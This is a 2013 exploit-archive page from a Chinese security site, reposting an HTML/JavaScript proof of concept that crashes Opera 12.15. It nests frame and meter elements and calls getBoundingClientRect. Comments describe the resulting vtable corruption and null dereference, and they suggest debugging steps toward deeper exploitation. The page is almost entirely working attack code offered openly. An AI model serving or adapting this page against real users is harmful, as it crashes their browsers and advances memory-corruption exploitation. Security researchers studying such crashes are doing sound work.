首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Opera 12.15 Denial Of Service
来源:vfocus.net 作者:vfocus 发布时间:2013-07-04  

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title> Opera 12.15 DOS POC</title>
</head>
<body>
<iframe id="wnd"></iframe>
<script type="text/javascript" language="JavaScript">

 /*
   Test: Windows 7 x64
   Version: Opera 12.15 Win32
   Link: www.opera.com
 */

  var wnd = document.getElementById("wnd");
      wnd = wnd.contentWindow;
       
  function d00m()
  {    
               var tag   = [];
               tag.push(document.createElement("frame"));
               tag.push(document.createElement("meter"));
           
               wnd.document.body.appendChild(tag[0]);
               wnd.document.body.appendChild(tag[1]);

               /* step 1*/
               var obj   = tag[1];
                 
               var obj_1 = tag[0];
                     
               try{ obj_1.appendChild(obj); }catch(b){}
                                                                /* eax = [esi + 14h] = this->unknow20 */
               try{ obj_1.getBoundingClientRect(); }catch(a){}  /* ecx = [eax + 14h] = this->unknow20->unknow20 */
                                                                /* eax = [ecx] = this->unknow20->unknow20[vtBl] (correnct) */
               /* step 2*/  
               var obj   = tag[0];
     
               var obj_1 = tag[1];
                   
               try{ obj_1.appendChild(obj); }catch(b){}      
            
               try{ obj_1.getBoundingClientRect();}catch(a){}   /* eax = [esi + 14h] = this->unknow20 */
                                                                /* ecx = [eax + 14h] = this->unknow20->unknow20 */     
    }                                                           /* eax = [ecx] = this->unknow20->unknow20[vtBl] (uncorrect) 0x00000000 reference */
   
    d00m();


    /* so we have here some kind of memory corruption */
    /* in "step 1" "vulnerable" code works fine he gets refernce to vtable and do some stuff */
    /* in "step 2" the same code do the same thing but vtable of refernced object is corrupted and has value 0x0000000*/
    /* logically next step should be checking why the vtable in "step 2" is corrupted */
    /* i observed heap allocation and free function between "step 1" and "step 2" - no alloc or free of intersting area occurs (but maybe i fuckup something) */
    /* We also can set mem access breakpoint on [eax+14h] at the right moment to find out what corrupt vtable */
    
   
   
   </script>
   <!--088241c155f232f70fcae7020157b9dcff210b84-->
  </body>
</html>


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Nokia 1280 Denial Of Service
·InstantCMS 1.6 Remote PHP Code
·Realtek Sound Manager AvRack (
·Adobe Reader X 10.1.4.38 - BMP
·ABBS Audio Media Player .LST B
·OpenNetAdmin 13.03.01 Remote C
·FileCOPA 7.01 Denial Of Servic
·AOL Instant Messenger 8.0.1.5
·WinAmp 5.63 - Stack-based Buff
·Google Chrome 25.0.1364.152 HT
·WinAmp 5.63 - Invalid Pointer
·Solaris Recommended Patch Clus
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved